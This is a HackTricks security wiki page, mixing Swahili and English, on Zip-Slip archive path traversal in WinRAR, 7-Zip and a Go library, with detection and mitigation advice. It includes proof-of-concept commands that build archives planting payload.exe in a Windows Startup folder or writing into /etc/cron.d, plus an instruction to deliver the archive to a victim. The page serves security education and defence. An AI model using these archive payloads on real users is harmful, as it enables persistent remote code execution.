Archive Extraction Path Traversal (βZip-Slipβ / WinRAR CVE-2025-8088)
Tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na π¬ kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter π¦ @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Muhtasari
Miundo mingi ya archive (ZIP, RAR, TAR, 7-ZIP, n.k.) huruhusu kila kipengee kuwa na internal path yake. Wakati utiliti ya uchimbaji inaheshimu bila kuchunguza njia hiyo, jina la faili lililotengenezwa likiwa na .. au absolute path (mfano C:\Windows\System32\) litaandikwa nje ya saraka iliyochaguliwa na mtumiaji.
Aina hii ya udhaifu inajulikana sana kama Zip-Slip au archive extraction path traversal.
Chanzo
- Mshambuliaji anaunda archive ambamo kichwa kimoja au zaidi cha faili kina:
- Relative traversal sequences (
..\..\..\Users\\victim\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\payload.exe) - Absolute paths (
C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\payload.exe) - Au symlinks zilizotengenezwa ambazo zinaelekezwa nje ya saraka lengwa (kwa kawaida katika ZIP/TAR kwenye nix).
- Mwadui anachimba archive hiyo kwa kutumia zana iliyo na udhaifu inayomwamini njia iliyojazwa ndani (au kufuata symlinks) badala ya kuisafisha au kulazimisha uchimbaji chini ya saraka iliyochaguliwa.
- Faili inaandikwa katika eneo linalodhibitiwa na mshambuliaji na itatekelezwa/kuingizwa wakati mfumo au mtumiaji itakapoiamsha njia hiyo.
Mfano wa Dunia Halisi β WinRAR β€ 7.12 (CVE-2025-8088)
WinRAR for Windows (including the rar / unrar CLI, the DLL and the portable source) ilishindwa kuthibitisha majina ya faili wakati wa uchimbaji.
Archive ya RAR yenye madhara iliyo na kipengee kama:
..\..\..\Users\victim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\payload.exe
ingemalizika nje ya saraka ya pato iliyochaguliwa na ndani ya saraka ya Startup ya mtumiaji. Baada ya kuingia, Windows inaendesha kiotomatiki kila kitu kilichomo hapo, ikitoa kudumu RCE.
Kutengeneza PoC Archive (Linux/Mac)
# Requires rar >= 6.x
mkdir -p "evil/../../../Users/Public/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup"
cp payload.exe "evil/../../../Users/Public/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/"
rar a -ep evil.rar evil/*
Chaguo zilizotumika:
-epβ hifadhi path za faili kama zilivyo (usifute./ya mwanzoni).
Wasilisha evil.rar kwa mwathirika na uwaelekeze waweke (extract) kwa build ya WinRAR yenye udhaifu.
Observed Exploitation in the Wild
ESET iliripoti kampeni za spear-phishing za RomCom (Storm-0978/UNC2596) ambazo zilikuwa na RAR archives zikitumiwa CVE-2025-8088 kupeleka customised backdoors na kurahisisha ransomware operations.
Newer Cases (2024β2025)
7-Zip ZIP symlink traversal β RCE (CVE-2025-11001 / ZDI-25-949)
- Bug: ZIP entries that are symbolic links zilitumika kama marejeo (dereferenced) wakati wa extraction, zikimruhusu mshambuliaji kutoroka directory ya kusudi na kuandika juu ya paths yoyote. Mwingiliano wa mtumiaji ni tu kufungua/kuondoa archive.
- Affected: 7-Zip 21.02β24.09 (Windows & Linux builds). Fixed in 25.00 (July 2025) and later.
- Impact path: Overwrite
Start Menu/Programs/Startupor service-run locations β code runs at next logon or service restart. - Quick PoC (Linux):
mkdir -p out
ln -s /etc/cron.d evil
zip -y exploit.zip evil # -y preserves symlinks
7z x exploit.zip -o/tmp/target # vulnerable 7-Zip writes to /etc/cron.d
On a patched build /etc/cron.d wonβt be touched; the symlink is extracted as a link inside /tmp/target.
Go mholt/archiver Unarchive() Zip-Slip (CVE-2025-3445)
- Bug:
archiver.Unarchive()follows../and symlinked ZIP entries, writing outsideoutputDir. - Affected:
github.com/mholt/archiverβ€ 3.5.1 (project now deprecated). - Fix: Switch to
mholt/archivesβ₯ 0.1.0 or implement canonical-path checks before write. - Minimal reproduction:
// go test . with archiver<=3.5.1
archiver.Unarchive("exploit.zip", "/tmp/safe")
// exploit.zip holds ../../../../home/user/.ssh/authorized_keys
Detection Tips
- Static inspection β Orodhesha archive entries na angazia kila jina linalojumuisha
../,..\\, absolute paths (/,C:) au entries za aina symlink ambazo target yao iko nje ya extraction dir. - Canonicalisation β Hakikisha
realpath(join(dest, name))bado inaanza nadest. Kataa vinginevyo. - Sandbox extraction β Fukua ndani ya directory inayoweza kutupwa (disposable) kwa kutumia extractor safe (mfano:
bsdtar --safe --xattrs --no-same-owner, 7-Zip β₯ 25.00) na thibitisha kwamba paths zilizotokana zinabaki ndani ya directory. - Endpoint monitoring β Toa alama/taarifa pale matumizi mapya ya executables yanapoandikwa kwenye
Startup/Run/cronnafasi kwa muda mfupi baada ya archive kufunguliwa na WinRAR/7-Zip/etc.
Mitigation & Hardening
- Update the extractor β WinRAR 7.13+ na 7-Zip 25.00+ zina utekelezaji wa kusafisha path/symlink. Zana zote bado hazina auto-update.
- Extract archives with βDo not extract pathsβ / βIgnore pathsβ inapowezekana.
- Kwenye Unix, pungua privileges & mount chroot/namespace kabla ya extraction; kwenye Windows, tumia AppContainer au sandbox.
- Ikiwa unaandika code maalum, normaliza kwa
realpath()/PathCanonicalize()kabla ya kuunda/kuandika, na kata entry yoyote inayotoroka nje ya destination.
Additional Affected / Historical Cases
- 2018 β Massive Zip-Slip advisory by Snyk affecting many Java/Go/JS libraries.
- 2023 β 7-Zip CVE-2023-4011 similar traversal during
-aomerge. - 2025 β HashiCorp
go-slug(CVE-2025-0377) TAR extraction traversal in slugs (patch in v1.2). - Any custom extraction logic that fails to call
PathCanonicalize/realpathprior to write.
References
- Trend Micro ZDI-25-949 β 7-Zip symlink ZIP traversal (CVE-2025-11001)
- JFrog Research β mholt/archiver Zip-Slip (CVE-2025-3445)
Tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na π¬ kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter π¦ @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.


